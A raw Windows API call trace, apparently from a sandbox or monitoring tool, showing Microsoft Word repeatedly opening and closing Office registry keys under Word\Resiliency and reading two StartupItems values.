[0087.493] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd18 | out: phkResult=0x1c81cd18*=0x530) returned 0x0
[0087.493] RegCloseKey (hKey=0x530) returned 0x0
[0087.493] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x530) returned 0x0
[0087.493] RegCloseKey (hKey=0x530) returned 0x0
[0087.493] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc58 | out: phkResult=0x1c81cc58*=0x530) returned 0x0
[0087.493] RegCloseKey (hKey=0x530) returned 0x0
[0087.493] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc58 | out: phkResult=0x1c81cc58*=0x530) returned 0x0
[0087.493] RegCloseKey (hKey=0x530) returned 0x0
[0087.493] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd18 | out: phkResult=0x1c81cd18*=0x530) returned 0x0
[0087.493] RegCloseKey (hKey=0x530) returned 0x0
[0087.493] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd18 | out: phkResult=0x1c81cd18*=0x530) returned 0x0
[0087.493] RegCloseKey (hKey=0x530) returned 0x0
[0087.493] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x530) returned 0x0
[0087.494] RegCloseKey (hKey=0x530) returned 0x0
[0087.494] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc58 | out: phkResult=0x1c81cc58*=0x530) returned 0x0
[0087.494] RegCloseKey (hKey=0x530) returned 0x0
[0087.494] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc58 | out: phkResult=0x1c81cc58*=0x530) returned 0x0
[0087.494] RegCloseKey (hKey=0x530) returned 0x0
[0087.494] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd18 | out: phkResult=0x1c81cd18*=0x530) returned 0x0
[0087.494] RegCloseKey (hKey=0x530) returned 0x0
[0087.494] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd18 | out: phkResult=0x1c81cd18*=0x530) returned 0x0
[0087.494] RegCloseKey (hKey=0x530) returned 0x0
[0087.494] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x530) returned 0x0
[0087.494] RegCloseKey (hKey=0x530) returned 0x0
[0087.494] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc58 | out: phkResult=0x1c81cc58*=0x530) returned 0x0
[0087.494] RegCloseKey (hKey=0x530) returned 0x0
[0087.494] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc58 | out: phkResult=0x1c81cc58*=0x530) returned 0x0
[0087.495] RegCloseKey (hKey=0x530) returned 0x0
[0087.495] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd18 | out: phkResult=0x1c81cd18*=0x530) returned 0x0
[0087.495] RegCloseKey (hKey=0x530) returned 0x0
[0087.495] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd18 | out: phkResult=0x1c81cd18*=0x530) returned 0x0
[0087.495] RegCloseKey (hKey=0x530) returned 0x0
[0087.495] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x530) returned 0x0
[0087.495] RegCloseKey (hKey=0x530) returned 0x0
[0087.495] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc58 | out: phkResult=0x1c81cc58*=0x530) returned 0x0
[0087.495] RegCloseKey (hKey=0x530) returned 0x0
[0087.495] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc58 | out: phkResult=0x1c81cc58*=0x530) returned 0x0
[0087.495] RegCloseKey (hKey=0x530) returned 0x0
[0087.495] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd18 | out: phkResult=0x1c81cd18*=0x530) returned 0x0
[0087.495] RegCloseKey (hKey=0x530) returned 0x0
[0087.496] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd18 | out: phkResult=0x1c81cd18*=0x530) returned 0x0
[0087.496] RegCloseKey (hKey=0x530) returned 0x0
[0087.496] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x530) returned 0x0
[0087.496] RegCloseKey (hKey=0x530) returned 0x0
[0087.496] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc58 | out: phkResult=0x1c81cc58*=0x530) returned 0x0
[0087.496] RegCloseKey (hKey=0x530) returned 0x0
[0087.496] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc58 | out: phkResult=0x1c81cc58*=0x530) returned 0x0
[0087.496] RegCloseKey (hKey=0x530) returned 0x0
[0087.496] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd18 | out: phkResult=0x1c81cd18*=0x530) returned 0x0
[0087.496] RegCloseKey (hKey=0x530) returned 0x0
[0087.496] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd18 | out: phkResult=0x1c81cd18*=0x530) returned 0x0
[0087.496] RegCloseKey (hKey=0x530) returned 0x0
[0087.496] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x530) returned 0x0
[0087.497] RegCloseKey (hKey=0x530) returned 0x0
[0087.497] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc58 | out: phkResult=0x1c81cc58*=0x530) returned 0x0
[0087.497] RegCloseKey (hKey=0x530) returned 0x0
[0087.497] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb08 | out: phkResult=0x1c81cb08*=0x530) returned 0x0
[0087.497] RegCloseKey (hKey=0x530) returned 0x0
[0087.497] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb28 | out: phkResult=0x1c81cb28*=0x530) returned 0x0
[0087.497] RegCloseKey (hKey=0x530) returned 0x0
[0087.497] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb28 | out: phkResult=0x1c81cb28*=0x530) returned 0x0
[0087.497] RegCloseKey (hKey=0x530) returned 0x0
[0087.497] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x530) returned 0x0
[0087.497] RegCloseKey (hKey=0x530) returned 0x0
[0087.497] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x530) returned 0x0
[0087.498] RegCloseKey (hKey=0x530) returned 0x0
[0087.498] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb08 | out: phkResult=0x1c81cb08*=0x530) returned 0x0
[0087.498] RegCloseKey (hKey=0x530) returned 0x0
[0087.498] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb28 | out: phkResult=0x1c81cb28*=0x530) returned 0x0
[0087.498] RegCloseKey (hKey=0x530) returned 0x0
[0087.498] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb28 | out: phkResult=0x1c81cb28*=0x530) returned 0x0
[0087.498] RegCloseKey (hKey=0x530) returned 0x0
[0087.498] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x530) returned 0x0
[0087.498] RegCloseKey (hKey=0x530) returned 0x0
[0087.498] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x530) returned 0x0
[0087.498] RegCloseKey (hKey=0x530) returned 0x0
[0087.498] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb08 | out: phkResult=0x1c81cb08*=0x530) returned 0x0
[0087.498] RegCloseKey (hKey=0x530) returned 0x0
[0087.498] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb28 | out: phkResult=0x1c81cb28*=0x530) returned 0x0
[0087.499] RegCloseKey (hKey=0x530) returned 0x0
[0087.499] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb28 | out: phkResult=0x1c81cb28*=0x530) returned 0x0
[0087.499] RegCloseKey (hKey=0x530) returned 0x0
[0087.499] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x530) returned 0x0
[0087.499] RegCloseKey (hKey=0x530) returned 0x0
[0087.499] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x530) returned 0x0
[0087.499] RegCloseKey (hKey=0x530) returned 0x0
[0087.499] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb08 | out: phkResult=0x1c81cb08*=0x530) returned 0x0
[0087.499] RegCloseKey (hKey=0x530) returned 0x0
[0087.499] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb28 | out: phkResult=0x1c81cb28*=0x530) returned 0x0
[0087.499] RegCloseKey (hKey=0x530) returned 0x0
[0087.499] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb28 | out: phkResult=0x1c81cb28*=0x530) returned 0x0
[0087.499] RegCloseKey (hKey=0x530) returned 0x0
[0087.500] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x530) returned 0x0
[0087.500] RegCloseKey (hKey=0x530) returned 0x0
[0087.500] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x530) returned 0x0
[0087.500] RegCloseKey (hKey=0x530) returned 0x0
[0087.500] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb08 | out: phkResult=0x1c81cb08*=0x530) returned 0x0
[0087.500] RegCloseKey (hKey=0x530) returned 0x0
[0087.500] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb28 | out: phkResult=0x1c81cb28*=0x530) returned 0x0
[0087.500] RegCloseKey (hKey=0x530) returned 0x0
[0087.500] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb28 | out: phkResult=0x1c81cb28*=0x530) returned 0x0
[0087.500] RegCloseKey (hKey=0x530) returned 0x0
[0087.500] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x530) returned 0x0
[0087.500] RegCloseKey (hKey=0x530) returned 0x0
[0087.500] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x530) returned 0x0
[0087.501] RegCloseKey (hKey=0x530) returned 0x0
[0087.501] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb08 | out: phkResult=0x1c81cb08*=0x530) returned 0x0
[0087.501] RegCloseKey (hKey=0x530) returned 0x0
[0087.501] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb28 | out: phkResult=0x1c81cb28*=0x530) returned 0x0
[0087.501] RegCloseKey (hKey=0x530) returned 0x0
[0087.501] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb28 | out: phkResult=0x1c81cb28*=0x530) returned 0x0
[0087.501] RegCloseKey (hKey=0x530) returned 0x0
[0087.501] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x530) returned 0x0
[0087.501] RegCloseKey (hKey=0x530) returned 0x0
[0087.501] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x530) returned 0x0
[0087.501] RegCloseKey (hKey=0x530) returned 0x0
[0087.501] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb08 | out: phkResult=0x1c81cb08*=0x530) returned 0x0
[0087.501] RegCloseKey (hKey=0x530) returned 0x0
[0087.502] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cb28 | out: phkResult=0x1c81cb28*=0x530) returned 0x0
[0087.502] RegCloseKey (hKey=0x530) returned 0x0
[0087.502] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c988 | out: phkResult=0x1c81c988*=0x530) returned 0x0
[0087.502] RegCloseKey (hKey=0x530) returned 0x0
[0087.502] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9a8 | out: phkResult=0x1c81c9a8*=0x530) returned 0x0
[0087.502] RegCloseKey (hKey=0x530) returned 0x0
[0087.502] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9a8 | out: phkResult=0x1c81c9a8*=0x530) returned 0x0
[0087.502] RegCloseKey (hKey=0x530) returned 0x0
[0087.502] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca68 | out: phkResult=0x1c81ca68*=0x530) returned 0x0
[0087.502] RegCloseKey (hKey=0x530) returned 0x0
[0087.502] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca68 | out: phkResult=0x1c81ca68*=0x530) returned 0x0
[0087.502] RegCloseKey (hKey=0x530) returned 0x0
[0087.502] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c988 | out: phkResult=0x1c81c988*=0x530) returned 0x0
[0087.503] RegCloseKey (hKey=0x530) returned 0x0
[0087.503] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9a8 | out: phkResult=0x1c81c9a8*=0x530) returned 0x0
[0087.503] RegCloseKey (hKey=0x530) returned 0x0
[0087.503] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9a8 | out: phkResult=0x1c81c9a8*=0x530) returned 0x0
[0087.503] RegCloseKey (hKey=0x530) returned 0x0
[0087.503] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca68 | out: phkResult=0x1c81ca68*=0x530) returned 0x0
[0087.503] RegCloseKey (hKey=0x530) returned 0x0
[0087.503] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca68 | out: phkResult=0x1c81ca68*=0x530) returned 0x0
[0087.503] RegCloseKey (hKey=0x530) returned 0x0
[0087.503] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c988 | out: phkResult=0x1c81c988*=0x530) returned 0x0
[0087.503] RegCloseKey (hKey=0x530) returned 0x0
[0087.503] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9a8 | out: phkResult=0x1c81c9a8*=0x530) returned 0x0
[0087.503] RegCloseKey (hKey=0x530) returned 0x0
[0087.504] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9a8 | out: phkResult=0x1c81c9a8*=0x530) returned 0x0
[0087.504] RegCloseKey (hKey=0x530) returned 0x0
[0087.504] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca68 | out: phkResult=0x1c81ca68*=0x530) returned 0x0
[0087.504] RegCloseKey (hKey=0x530) returned 0x0
[0087.504] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca68 | out: phkResult=0x1c81ca68*=0x530) returned 0x0
[0087.504] RegCloseKey (hKey=0x530) returned 0x0
[0087.504] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c988 | out: phkResult=0x1c81c988*=0x530) returned 0x0
[0087.504] RegCloseKey (hKey=0x530) returned 0x0
[0087.504] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9a8 | out: phkResult=0x1c81c9a8*=0x530) returned 0x0
[0087.504] RegCloseKey (hKey=0x530) returned 0x0
[0087.504] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9a8 | out: phkResult=0x1c81c9a8*=0x530) returned 0x0
[0087.504] RegCloseKey (hKey=0x530) returned 0x0
[0087.504] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca68 | out: phkResult=0x1c81ca68*=0x530) returned 0x0
[0087.505] RegCloseKey (hKey=0x530) returned 0x0
[0087.505] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca68 | out: phkResult=0x1c81ca68*=0x530) returned 0x0
[0087.505] RegCloseKey (hKey=0x530) returned 0x0
[0087.505] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c988 | out: phkResult=0x1c81c988*=0x530) returned 0x0
[0087.505] RegCloseKey (hKey=0x530) returned 0x0
[0087.505] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9a8 | out: phkResult=0x1c81c9a8*=0x530) returned 0x0
[0087.505] RegCloseKey (hKey=0x530) returned 0x0
[0087.505] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9a8 | out: phkResult=0x1c81c9a8*=0x530) returned 0x0
[0087.505] RegCloseKey (hKey=0x530) returned 0x0
[0087.505] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca68 | out: phkResult=0x1c81ca68*=0x530) returned 0x0
[0087.505] RegCloseKey (hKey=0x530) returned 0x0
[0087.505] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca68 | out: phkResult=0x1c81ca68*=0x530) returned 0x0
[0087.505] RegCloseKey (hKey=0x530) returned 0x0
[0087.506] RegQueryInfoKeyW (in: hKey=0x530, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81d03c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81d038, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81d03c*=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81d038*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0087.506] CoTaskMemFree (pv=0x0)
[0087.506] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0087.506] RegEnumValueW (in: hKey=0x530, dwIndex=0x0, lpValueName=0x2baf50, lpcchValueName=0x1c81d0e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="mq*", lpcchValueName=0x1c81d0e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0087.506] CoTaskMemFree (pv=0x2baf50)
[0087.506] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0087.506] RegEnumValueW (in: hKey=0x530, dwIndex=0x1, lpValueName=0x2baf50, lpcchValueName=0x1c81d0e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="|5,", lpcchValueName=0x1c81d0e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0087.506] CoTaskMemFree (pv=0x2baf50)
[0087.506] RegQueryValueExW (in: hKey=0x530, lpValueName="mq*", lpReserved=0x0, lpType=0x1c81d1cc, lpData=0x0, lpcbData=0x1c81d1c8*=0x0 | out: lpType=0x1c81d1cc*=0x3, lpData=0x0, lpcbData=0x1c81d1c8*=0x44) returned 0x0
[0087.506] RegQueryValueExW (in: hKey=0x530, lpValueName="mq*", lpReserved=0x0, lpType=0x1c81d1cc, lpData=0x31e7808, lpcbData=0x1c81d1c8*=0x44 | out: lpType=0x1c81d1cc*=0x3, lpData=0x31e7808*, lpcbData=0x1c81d1c8*=0x44) returned 0x0
[0087.506] RegQueryValueExW (in: hKey=0x530, lpValueName="|5,", lpReserved=0x0, lpType=0x1c81d1cc, lpData=0x0, lpcbData=0x1c81d1c8*=0x0 | out: lpType=0x1c81d1cc*=0x3, lpData=0x0, lpcbData=0x1c81d1c8*=0x44) returned 0x0
[0087.506] RegQueryValueExW (in: hKey=0x530, lpValueName="|5,", lpReserved=0x0, lpType=0x1c81d1cc, lpData=0x31e8190, lpcbData=0x1c81d1c8*=0x44 | out: lpType=0x1c81d1cc*=0x3, lpData=0x31e8190*, lpcbData=0x1c81d1c8*=0x44) returned 0x0
[0087.508] RegQueryInfoKeyW (in: hKey=0x530, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81d05c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81d058, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81d05c*=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81d058*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0087.509] CoTaskMemFree (pv=0x0)
[0087.509] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0087.509] RegEnumValueW (in: hKey=0x530, dwIndex=0x0, lpValueName=0x2baf50, lpcchValueName=0x1c81d108, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="mq*", lpcchValueName=0x1c81d108, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0087.509] CoTaskMemFree (pv=0x2baf50)
[0087.509] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
